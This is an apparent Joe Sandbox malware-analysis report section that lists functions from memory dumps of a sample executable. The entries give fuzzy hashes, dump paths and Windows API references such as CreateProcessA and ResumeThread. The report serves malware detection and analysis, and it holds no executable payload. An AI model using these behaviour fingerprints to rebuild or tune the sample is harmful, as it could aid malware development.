Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c238434adf2dea75626db781b94484c32c74e6dd19339734552d3617fb0b7042
Instruction ID: e2c377b40c9697a3f47c9cfef5a58ae00d53de2582d45cacff9c72d619868657
Opcode Fuzzy Hash: c238434adf2dea75626db781b94484c32c74e6dd19339734552d3617fb0b7042
Instruction Fuzzy Hash: 82117CB03002068FD7A4AF6ED494A2AB3D5FF8964479444BDD60ACB3A1DB61EC09C791

Function 06A4CA38 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65bee4942eff3999f93d822c0e2a428d0e3a55c2f81a7fa3657cf77880a08984
Instruction ID: 0f658d32a04f5722e7c27e35c2a888cd18617fb4fee2ad88196eb4c7ca1ab8e4
Opcode Fuzzy Hash: 65bee4942eff3999f93d822c0e2a428d0e3a55c2f81a7fa3657cf77880a08984
Instruction Fuzzy Hash: 75110C31B092449FD7045B3958586BBBFA7BFCA210B14497BE547C729ACD354C0687A0

Function 06A484E8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527c0dbfdcc452b1ed18e3e13fafd5fe9ce83af43578d9d4a77b0bf61cfe73e2
Instruction ID: 9fa92f0c8bc5a40e3bafee4b6a08f0078a0b56a5e71ac47831848b34b8c572e9
Opcode Fuzzy Hash: 527c0dbfdcc452b1ed18e3e13fafd5fe9ce83af43578d9d4a77b0bf61cfe73e2
Instruction Fuzzy Hash: 671156B2800249DFCB10EF99D944BDEBFF4EB48320F148419E918A7210C339A954CFA4

Function 02BFD4D0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929abcbf6ed2ae755141e84d065df5a384a92a9943f853e535abf4881847ae74
Instruction ID: 8b4ded03018f6b818d5f9b0ca9c47757af31cf576860c191b7c2d5c926aedc99
Opcode Fuzzy Hash: 929abcbf6ed2ae755141e84d065df5a384a92a9943f853e535abf4881847ae74
Instruction Fuzzy Hash: CD114C74E0020A9FCB45EFBDD58179EBBF1FB44304F10C5AAD1149B328EB706A098B81

Function 02BF1F61 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816f6bfce891f1b17a2bb8be91ebbca6ad02c8099109592dc137e164bf5d8c68
Instruction ID: b0179dd93a2717ad954e735aff124bfaf3fd88ae63623d1e449a95a539e6da26
Opcode Fuzzy Hash: 816f6bfce891f1b17a2bb8be91ebbca6ad02c8099109592dc137e164bf5d8c68
Instruction Fuzzy Hash: 5D21E2B5D056098FDB40EFA9D8866EEBFF0FB09300F10866AD805B3214EB305A55CFA1

Function 06A48171 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43161312ce9c276d803cbcabc6fee26aa950cf0415112f0e428ec78531c554dd
Instruction ID: 7fbdec5fb291c48d57e1296d661482c7107e4db20ea8f3e9439f598d5b4f0b92
Opcode Fuzzy Hash: 43161312ce9c276d803cbcabc6fee26aa950cf0415112f0e428ec78531c554dd
Instruction Fuzzy Hash: 08112E34F001498FEB40EBECEC50BAEBBB5AB88314F019061E918A7344EA349941CB61

Function 02BF1F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d14b9034d1587c7b194cfc29042df7e99c1c5e47f40a3b794c3b8e853199bf
Instruction ID: ba06dc03284225420079322919d3ad4054d40395942b4abb235bd89b5fff14a9
Opcode Fuzzy Hash: 85d14b9034d1587c7b194cfc29042df7e99c1c5e47f40a3b794c3b8e853199bf
Instruction Fuzzy Hash: 1B213674C046098FCB00EFA8D8585EDBFB0FF4A310F1046AAD445B7264EB301A85CBA1

Function 02B0D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3760207110.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b0d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction ID: 8d310fb2e68dff73a05f63b6681dc22ce3a795ed61c67fa3f675c27f86af332b
Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction Fuzzy Hash: 2611D075504244CFCB12CF50D9C4B15BF61FB44314F24C6ADE8494B692C33AD44ACF51

Function 06A48C48 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4db935c2262a20c7c4aa407fb57ba674951a27603e4697f4e6f3ccacf5e10a1d
Instruction ID: ff64689c4a70aa4a08457885fe992cba8cfba3436b9fe07e9d3e67a892d203a4
Opcode Fuzzy Hash: 4db935c2262a20c7c4aa407fb57ba674951a27603e4697f4e6f3ccacf5e10a1d
Instruction Fuzzy Hash: C61120B6800249DFCB10DF99D945BEEBBF4EB48320F14841AE928A7250C339A594DFA1

Function 02BF5607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26f29f2a7a21f2cc25dd1c421c7f5c702790cef75b4800ac0b36c4e41791a2f1
Instruction ID: fe73943ce47175feef4d0f8addb88e48f13b30c012d35908d093a584387d3cf1
Opcode Fuzzy Hash: 26f29f2a7a21f2cc25dd1c421c7f5c702790cef75b4800ac0b36c4e41791a2f1
Instruction Fuzzy Hash: FE012472B001146FDB169E68D810BAF3BEBEBCA350F18802AF615C7240CE319812DBA0

Function 06A42210 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cafef66486ce8a44eca5f255f55084a4d53c0e19a2fe113e000757879644919
Instruction ID: 821f36b40a31c0401d04aebc469f4d8182e74e5263940453bafd0b87368743e7
Opcode Fuzzy Hash: 8cafef66486ce8a44eca5f255f55084a4d53c0e19a2fe113e000757879644919
Instruction Fuzzy Hash: 46118075F502118FC750EF78E91865ABBF5FF8961171005AAE809DB311EB71C905CB90

Function 06A42188 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50effa52074734d50c2d82cc8473e3505049d4f9991ac7531638ade4731da40
Instruction ID: fef0fee1e856063b805f0593899640d34da807de5a9c8e5d7ac45229ce57e7b2
Opcode Fuzzy Hash: e50effa52074734d50c2d82cc8473e3505049d4f9991ac7531638ade4731da40
Instruction Fuzzy Hash: 2901E470E002199FCB84EFB988006EEBBB5BF88200F10856AD919F7250EB345A01CB90

Function 06A48A10 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c0609574b198bdeb305d65d2cd60446b84c31d1510af787435d707ea4b03d1
Instruction ID: 29b05155cb956b9424fbab34a714eacdfbf02039242f450d8d0db383a34362f3
Opcode Fuzzy Hash: f2c0609574b198bdeb305d65d2cd60446b84c31d1510af787435d707ea4b03d1
Instruction Fuzzy Hash: D1F089363002196F8F05AE98AC509AF7FEBEBC8260B404429FA05C7350DE32982197A5

Function 06A41CC0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d57e1521506570236830531e374b32f989c21d9734ea9ceb6d1d46a95f2124
Instruction ID: 1c795b1334eda0c7616bfb22f4ffea6d5178f1b23cf12c45d988c4c37dcff588
Opcode Fuzzy Hash: b6d57e1521506570236830531e374b32f989c21d9734ea9ceb6d1d46a95f2124
Instruction Fuzzy Hash: 37F054317041108FD754BF29D8189367BA6AFC6610B1544AAE909CF261DA60CC41CBA1

Function 06A41CD0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc74831165f468c5c6b70d697a3ac69cf63dc1891a78e189e414d5aebd8e532b
Instruction ID: 999d67cdee73dcc4787750342053e38fce140ca875b48667a237b8c8c83a2521
Opcode Fuzzy Hash: dc74831165f468c5c6b70d697a3ac69cf63dc1891a78e189e414d5aebd8e532b
Instruction Fuzzy Hash: AFF01C357401148FD758BF2AE858A3A77EAEFC5661B1584A9E90ACB361DE70DC018BA0

Function 02BF2010 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a995cf990efd648e32a779c8d06dad6763c12e9a0a62a422e5401abbc14059ee
Instruction ID: fbad699083e5e13d12c1479e502fcdb391ff5b1e75246adf46b27b0e58c6e24d
Opcode Fuzzy Hash: a995cf990efd648e32a779c8d06dad6763c12e9a0a62a422e5401abbc14059ee
Instruction Fuzzy Hash: 39E0CD73D1022A53CB00D7A1DC056DFF738EFA2355F448621D42433140FBB1275A82E1

Function 02BF2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575b7641f5de22e28a637054fc2367d963ee4d5522586762f30d20ed5e401514
Instruction ID: 9881684e2ac1c203c46f0e201e92faa7cd433983539ecb409d52f3263c0f21e1
Opcode Fuzzy Hash: 575b7641f5de22e28a637054fc2367d963ee4d5522586762f30d20ed5e401514
Instruction Fuzzy Hash: 84D05B31D2022B57CB00E7A5DC044EFF738EED5265B908626D55437140FB702659C7E1

Function 02BF8258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: e2049fa48bc3c6e943cccb70727083a77e56c37d3f59a8d5d1a5112bfaf9a5a5
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 1EC08C3320C1382BA674108F7C40EB7BB8CC3C13F4A2501B7FA5CE7200A842AC8441F8

Function 02BFA70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24720aeaffcc6cd27c60842a81dbe82c6f1253c1c397592e8f76ec7afe65be52
Instruction ID: 3109bfe966ddfadcb9aaf2fd1eeb286ca1546f1ddb193177897028f0f173b52c
Opcode Fuzzy Hash: 24720aeaffcc6cd27c60842a81dbe82c6f1253c1c397592e8f76ec7afe65be52
Instruction Fuzzy Hash: 3BD0677BB410189FCB049F9CE880DDDB7B6FB9C221B048516E915A3261C6329921DB50

Function 02BF5EA8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea804225903315bc1bdfcd6f1061a27ab3c7afa9b1407b229a2e7d90d6e8d8df
Instruction ID: f3fa52b6506c5a2852be0518a370bc8ba6c0b162ed8a0ccf3acca23d82f27ae1
Opcode Fuzzy Hash: ea804225903315bc1bdfcd6f1061a27ab3c7afa9b1407b229a2e7d90d6e8d8df
Instruction Fuzzy Hash: 22D02E714083C38FC302FB30EA562083F31BA82308F8009A1E8094A52FEBB80A0987D1

Function 02BF5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301b9f58ab64a1753770e7c26443fa2f3540611f9ac30898da43a84e6f0fee98
Instruction ID: f8860573010860a7142ce7969609ecd3b499fb23b39c1058b94688fbb5951b5c
Opcode Fuzzy Hash: 301b9f58ab64a1753770e7c26443fa2f3540611f9ac30898da43a84e6f0fee98
Instruction Fuzzy Hash: B3C0123554574B4BC501FB75FA86619776AB6C1304F404A20B0090622DDF7429488690

Function 06A41CA1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df530a0ac2bebcaa62aed03706c8fa45e200ea47be2d398ba19a972832b6133
Instruction ID: 443bb5227e726f7c5c7ca786ab56e6116a2e6a12e897390822cfd0dd7fe6e0dd
Opcode Fuzzy Hash: 3df530a0ac2bebcaa62aed03706c8fa45e200ea47be2d398ba19a972832b6133
Instruction Fuzzy Hash: E0C08C3040A6838FCF22EF6868682087FA0FB87200F6002D6C0528B0B2C221019ACB22

Non-executed Functions

Function 06A4CB00 Relevance: 5.1, Strings: 4, Instructions: 142COMMON

Download Yara Rule

Strings

Xcq, xrefs: 06A4CBEB
Xcq, xrefs: 06A4CB65
Xcq, xrefs: 06A4CB31
Xcq, xrefs: 06A4CC33

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID: Xcq$Xcq$Xcq$Xcq
API String ID: 0-2577476577
Opcode ID: 2eef727ff268ab613108cc6563941648370862b120f2685a03f45788e09418a8
Instruction ID: 9b78b727df965b90d6c40d07bb93abc2f9e5175d00b16934b41493fcb0499f54
Opcode Fuzzy Hash: 2eef727ff268ab613108cc6563941648370862b120f2685a03f45788e09418a8
Instruction Fuzzy Hash: 1E410835E4111A4BDB79BB68CC907BFA6A6AFC4320F1444B5C91FEB642EB308D419BD1

Function 06A4CAF0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xcq, xrefs: 06A4CBEB
Xcq, xrefs: 06A4CB65
Xcq, xrefs: 06A4CB31
Xcq, xrefs: 06A4CC33

Memory Dump Source

Source File: 0000000E.00000002.3768259493.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a40000_file.jbxd

Similarity

API ID:
String ID: Xcq$Xcq$Xcq$Xcq
API String ID: 0-2577476577
Opcode ID: 1a0d76f8cb44a70474c82e9c8fbc84fbc30b69c9ca6b2993a3444c3bc338afc4
Instruction ID: 3ca6ef164d633bebbe091f6c9aa6e7c4abccafdabc382b1588cad4f5f582dff0
Opcode Fuzzy Hash: 1a0d76f8cb44a70474c82e9c8fbc84fbc30b69c9ca6b2993a3444c3bc338afc4
Instruction Fuzzy Hash: 5E31C631E4122B4BDBB9BB68CD5037EA6B17BC4310F1045B5C81FEB646EB308D419B95

Function 02BF6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;_q, xrefs: 02BF60C6
\;_q, xrefs: 02BF60BA
\;_q, xrefs: 02BF609E
\;_q, xrefs: 02BF6094

Memory Dump Source

Source File: 0000000E.00000002.3761051782.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2bf0000_file.jbxd

Similarity

API ID:
String ID: \;_q$\;_q$\;_q$\;_q
API String ID: 0-294077808
Opcode ID: 0273149955bf6f455ed4e186266233da0e7ed645164420fb3b2b325a774fef06
Instruction ID: b6e723332dba2f6b38f8d4db88825c79435317090401febb2a4e73ad4743c846
Opcode Fuzzy Hash: 0273149955bf6f455ed4e186266233da0e7ed645164420fb3b2b325a774fef06
Instruction Fuzzy Hash: 8F01B1317000198F8BE48E3CC494A2577EEEFC866433541BAEA11CB7B8DA71DC45C740

Analysis Process: rXcourOVPD.exePID: 6576, Parent PID: 1060COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	345
Total number of Limit Nodes:	24

Executed Functions

Function 06FFCBCC Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FFCE0E

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8059c0c1c83f2f6ecff660875fccaf20c3a9e752c605521109b4b90aa2c5b61b
Instruction ID: 826aca31b206d140320b91335818ab85df8fcfda97c818e1c5baec683030febc
Opcode Fuzzy Hash: 8059c0c1c83f2f6ecff660875fccaf20c3a9e752c605521109b4b90aa2c5b61b
Instruction Fuzzy Hash: D8A17871D1026DCFDB60CFA8C841BEEBBB2BF48310F0485A9D958A7250DB749985CF91

Function 06FFCBD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FFCE0E

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e67a49affb3ba057a8a2f17d9c9aa0c69d26feeee99265aa1f55296fb5af4b12
Instruction ID: bd954c1f4fd0786dd46f3928b85f8498f12f7437f871b5687d153875ce53abb4
Opcode Fuzzy Hash: e67a49affb3ba057a8a2f17d9c9aa0c69d26feeee99265aa1f55296fb5af4b12
Instruction Fuzzy Hash: C6917971D1026DCFDB60CF68C841BEEBBB2BF48314F0485A9D958A7290DB749985CF91

Function 028FAED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028FB126

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d79348f10f6ba02b9c647f370ee7e699b1bca446a84b13ccd653c4aaa2ee4add
Instruction ID: ab1e861cd481debc0adf89cae583f2e4ca759eda1af5bf4094fa9a652210027f
Opcode Fuzzy Hash: d79348f10f6ba02b9c647f370ee7e699b1bca446a84b13ccd653c4aaa2ee4add
Instruction Fuzzy Hash: E17146B8A00B058FD768DF29D45476ABBF1FF88314F008A2DD18ADBA50D775E845CB91

Function 06FFC370 Relevance: 1.7, APIs: 1, Instructions: 158threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FFC332

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 56d270b3ca93b5b3423feaf93557773a24413365f02aa1878575b5594b6cb837
Instruction ID: c0f4d5f3c04a53e829a3fdce873fd9027bf98aa142ea42ba40a788fc73e5adc5
Opcode Fuzzy Hash: 56d270b3ca93b5b3423feaf93557773a24413365f02aa1878575b5594b6cb837
Instruction Fuzzy Hash: 58616971E102298FCB14DFA9C9806AEFBF2FF88304F248169D508A7325C7319942CFA0

Function 050B1CE5 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050B1E02

Memory Dump Source

Source File: 0000000F.00000002.1394974198.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_50b0000_rXcourOVPD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3431904050fd60d9f49d55fc73efe76ed4a4c00d311f8f612e34d0fd3280bed9
Instruction ID: dd805f2f3f9469dbb39b619bc606b55fd39f80f2a850c23e3ad170714cfaf016
Opcode Fuzzy Hash: 3431904050fd60d9f49d55fc73efe76ed4a4c00d311f8f612e34d0fd3280bed9
Instruction Fuzzy Hash: E551B0B1D00349AFDB14CFA9D894ADEBBF5FF48310F64812AE419AB210D7B59945CF90

Function 050B0AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050B1E02

Memory Dump Source

Source File: 0000000F.00000002.1394974198.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_50b0000_rXcourOVPD.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a89dab9bce2787b1667ed042384011b80d8aadaac410a5e5d5e8c864d650f51a
Instruction ID: de23d771e1e1d4b84d875a6f20f9916895b2db1dc32caa036fe63c42ea3e3df4
Opcode Fuzzy Hash: a89dab9bce2787b1667ed042384011b80d8aadaac410a5e5d5e8c864d650f51a
Instruction Fuzzy Hash: 0D51B0B1D003499FDB14CF99D894ADEBBF6BF48310F64812AE819AB210D7B5A845CF90

Function 050B0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 050B4381

Memory Dump Source

Source File: 0000000F.00000002.1394974198.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_50b0000_rXcourOVPD.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b07e9735aca1b1297bb7564a7b4fbd245fe5d8076e55a6487245a54e84d08f4f
Instruction ID: f49afe56da1d280b61770b8f83a728cc1c5abc2e49823119fa50608278925d31
Opcode Fuzzy Hash: b07e9735aca1b1297bb7564a7b4fbd245fe5d8076e55a6487245a54e84d08f4f
Instruction Fuzzy Hash: 9C414AB49003099FDB14CF99D488AAEBBF6FF88314F18C559D419AB321D374A941CFA0

Function 028F449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 028F59A9

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4491e721a800e7f58988a6c1b885bafe5c47507a1baa430e637dfeff1e5ca258
Instruction ID: 30a074b06db7c849dc641fc110ced4d4a719b28fbf94e7314eef6d9855aef97c
Opcode Fuzzy Hash: 4491e721a800e7f58988a6c1b885bafe5c47507a1baa430e637dfeff1e5ca258
Instruction Fuzzy Hash: 3341F3B4C0071DCBDB24DFA9C844B9DBBF5BF48304F60806AD508AB255DB75694ACF90

Function 028F58ED Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 028F59A9

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 420e542a83701fbefd60c8b57ba26c908076c8fe5a6bc52c44c25e45f948c7d9
Instruction ID: 30054275ffd3f6ca9a52ab91df5f8fd3529cd54afe98364b894482adcadb7f9c
Opcode Fuzzy Hash: 420e542a83701fbefd60c8b57ba26c908076c8fe5a6bc52c44c25e45f948c7d9
Instruction Fuzzy Hash: 0C41E2B4D00719CFDB24DFA9C984B9DBBB1BF48304F20806AD408BB255DB75694ACFA0

Function 06F33100 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1396493284.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f30000_rXcourOVPD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 3aa423318a3cf9ae5b31d05a0cb65315d8de83b9d2c27595b627efd43cf41d77
Instruction ID: 91a62916f1e03abfc5c0389743a762be518a975677c540f4c7a3369fef63c3c0
Opcode Fuzzy Hash: 3aa423318a3cf9ae5b31d05a0cb65315d8de83b9d2c27595b627efd43cf41d77
Instruction Fuzzy Hash: 1F319A7290439D9FCB11DFA9C804AEEBFF8EF49320F14805AE954A7261C3359855CFA1

Function 028F5A64 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

